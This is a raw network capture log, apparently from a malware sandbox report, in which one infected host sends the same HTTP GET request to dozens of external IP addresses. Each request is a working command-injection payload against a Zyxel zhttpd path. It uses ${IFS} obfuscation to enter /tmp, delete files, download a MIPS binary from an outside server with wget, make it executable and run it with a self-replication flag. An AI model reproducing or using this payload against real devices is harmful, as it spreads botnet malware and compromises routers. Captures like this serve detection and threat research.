                                      Jan 19, 2024 17:29:44.003926039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7146192.168.2.145572013.7.195.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.003953934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7147192.168.2.1433846142.44.25.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.004002094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7148192.168.2.145117466.200.173.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.004034042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7149192.168.2.143819225.178.135.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.004097939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7150192.168.2.145947482.253.253.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.004123926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7151192.168.2.144387636.104.78.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.004152060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7152192.168.2.145218052.179.187.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.004210949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7153192.168.2.144769859.175.213.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.004223108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7154192.168.2.145242690.218.181.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.004261971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7155192.168.2.14499729.107.150.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.004327059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7156192.168.2.145446434.187.58.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.004365921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7157192.168.2.146037291.173.32.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.004398108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7158192.168.2.1447088179.10.50.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.004431963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7159192.168.2.1453870179.149.100.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.004493952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7160192.168.2.1441462130.127.112.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.004534960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7161192.168.2.1451358190.97.93.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.004571915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7162192.168.2.1446674171.101.56.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.004621029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7163192.168.2.1433064154.213.124.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.004642010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7164192.168.2.1435938200.35.93.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.004679918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7165192.168.2.1459998172.56.232.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.004715919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7166192.168.2.144561051.184.213.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.004761934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7167192.168.2.1437584208.70.52.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.004789114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7168192.168.2.143832672.11.219.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.004849911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7169192.168.2.144442453.78.162.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.004884958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7170192.168.2.1456508147.202.134.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.004936934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7171192.168.2.1436354194.213.166.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.005000114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7172192.168.2.144279036.33.250.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.005033970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7173192.168.2.14379145.216.185.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.005075932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7174192.168.2.1450872202.59.67.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.005142927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7175192.168.2.1454300128.27.48.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.005182028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7176192.168.2.145300887.195.173.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.005224943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7177192.168.2.1442458104.37.113.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.005275965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7178192.168.2.144680244.22.137.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.005312920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7179192.168.2.1460738158.227.254.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.005331039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7180192.168.2.1459928116.138.50.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.005362034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7181192.168.2.145238481.52.130.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.005423069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7182192.168.2.1432858110.5.249.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.005470037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7183192.168.2.145420044.147.236.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.005508900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7184192.168.2.1441080135.78.31.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.005556107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7185192.168.2.1439840117.163.63.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.005584002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7186192.168.2.145335024.205.199.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.005618095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7187192.168.2.144715441.44.147.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.005646944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7188192.168.2.144613044.62.85.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.005693913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7189192.168.2.143928095.24.86.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.005726099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7190192.168.2.144371432.61.162.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.005752087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7191192.168.2.1455330193.230.228.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.005796909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7192192.168.2.1441306126.69.64.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.005836010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7193192.168.2.1441172115.21.231.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.005873919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7194192.168.2.14346085.72.207.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.005940914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7195192.168.2.145819852.238.7.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.005964994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7196192.168.2.145153497.222.164.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.006002903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7197192.168.2.1448196161.38.116.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.006050110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7198192.168.2.1446848133.117.61.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.006083965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7199192.168.2.1458372132.101.156.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.006131887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7200192.168.2.145691232.63.195.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.006175995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7201192.168.2.1445676147.236.105.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.006206036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7202192.168.2.1433474142.4.215.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.006258965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7203192.168.2.1438008159.150.19.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.006282091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7204192.168.2.14452561.151.253.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.006340027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7205192.168.2.1451766198.20.65.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.006376028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7206192.168.2.1436688187.44.38.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.006423950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7207192.168.2.1436992183.150.180.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.006474972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7208192.168.2.143662059.253.10.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.006515026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7209192.168.2.144967887.142.53.39443
                                      TimestampBytes transferredDirectionData
